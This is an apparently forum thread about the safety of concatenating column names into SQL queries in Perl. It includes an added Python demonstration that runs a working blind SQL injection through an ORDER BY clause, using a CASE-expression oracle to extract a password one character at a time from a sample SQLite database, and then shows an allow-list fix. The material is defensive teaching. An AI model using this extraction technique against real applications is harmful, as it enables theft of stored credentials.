in reply to Safety of concatenating query string

bradcathey:

If your program is the source of the column names, then there shouldn't be a concern. You typically have problems with SQL-injection issues when a third-party can put in bits of code that can mess up the database. For example, in your first case, your program is supplying the names, so you don't have to worry. But if it were more like:

my $sort_by = <>;
my $stmt = 'SELECT * FROM time_sheet WHERE user_id=? ORDER BY ' . $sort_by;

Then you're opening the door for someone to hose your database.

...roboticus

When your only tool is a hammer, all problems look like your thumb.
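To make roboticus's warning concrete, here is an added example (not code from the thread; it uses Python and an in-memory SQLite database rather than Perl/DBI, and the table contents, the users table and its password column are all constructed for the demonstration). It shows the same pattern: user_id is bound with a placeholder, but the ORDER BY target is concatenated. Because a sort key can be any SQL expression, an attacker who controls it gets a boolean oracle and can read other tables one character at a time, with no second statement and no quotes in the column name. The hardened form beside it maps a caller-supplied key to a program-supplied column through an allow-list, which is the fix when the identifier really must vary, since placeholders cannot carry column names.

```python
import sqlite3
import string


def make_db():
    """Constructed sample data (not from the original thread): a time_sheet
    table like the one in the question plus a users table with a secret."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE time_sheet(id INTEGER PRIMARY KEY, user_id INTEGER, hours REAL);
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, password TEXT);
        INSERT INTO time_sheet VALUES (1, 7, 8.0), (2, 7, 2.5), (3, 7, 5.0);
        INSERT INTO users VALUES (7, 'brad', 'hunter2');
    """)
    return con


def query_unsafe(con, user_id, sort_by):
    """The pattern roboticus warns about: user_id is bound as a parameter,
    but the ORDER BY target is concatenated straight into the SQL text."""
    stmt = "SELECT id, hours FROM time_sheet WHERE user_id=? ORDER BY " + sort_by
    return con.execute(stmt, (user_id,)).fetchall()


# Hardened form: the caller chooses a key, the program supplies the SQL.
# Bind placeholders cannot carry identifiers, so an allow-list is the fix.
ALLOWED_SORT = {"id": "id", "hours": "hours", "hours_desc": "hours DESC"}


def query_safe(con, user_id, sort_by):
    if sort_by not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort key: {sort_by!r}")
    stmt = "SELECT id, hours FROM time_sheet WHERE user_id=? ORDER BY " + ALLOWED_SORT[sort_by]
    return con.execute(stmt, (user_id,)).fetchall()


def oracle(con, user_id, condition):
    """Boolean oracle built on the unsafe query. The CASE expression sorts by
    id when `condition` is true and by -id when it is false, so the id of
    the first row returned reveals the truth value of any SQL condition."""
    sort_by = f"CASE WHEN ({condition}) THEN id ELSE -id END"
    rows = query_unsafe(con, user_id, sort_by)
    return rows[0][0] == 1


def extract_password(con, user_id, alphabet=string.ascii_lowercase + string.digits):
    """Recover users.password one character at a time through the oracle.
    substr() is 1-indexed in SQLite; an empty result past the end of the
    string matches no candidate, which terminates the loop."""
    recovered = ""
    while True:
        pos = len(recovered) + 1
        for ch in alphabet:
            cond = f"(SELECT substr(password,{pos},1) FROM users WHERE id={user_id})='{ch}'"
            if oracle(con, user_id, cond):
                recovered += ch
                break
        else:
            return recovered


if __name__ == "__main__":
    con = make_db()
    print("legitimate sort:", query_unsafe(con, 7, "hours"))
    print("leaked via ORDER BY:", extract_password(con, 7))
    print("allow-listed sort:", query_safe(con, 7, "hours_desc"))
    try:
        query_safe(con, 7, "CASE WHEN 1 THEN id END")
    except ValueError as e:
        print("rejected:", e)
```

The attack needs nothing but a column name that is secretly an expression: no semicolon, no quote in the sort key, and the bound user_id placeholder does nothing to stop it. That is why the distinction roboticus draws matters: identifiers the program chooses are safe to concatenate, identifiers a third party chooses must be validated against a fixed list before they touch the statement.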

Re^2: Safety of concatenating query string
by bradcathey (Prior) on Jun 24, 2011 at 19:16 UTC

    Thanks for the reassurance all. Good to know.

    —Brad
    "The important work of moving the world forward does not wait to be done by perfect men." George Eliot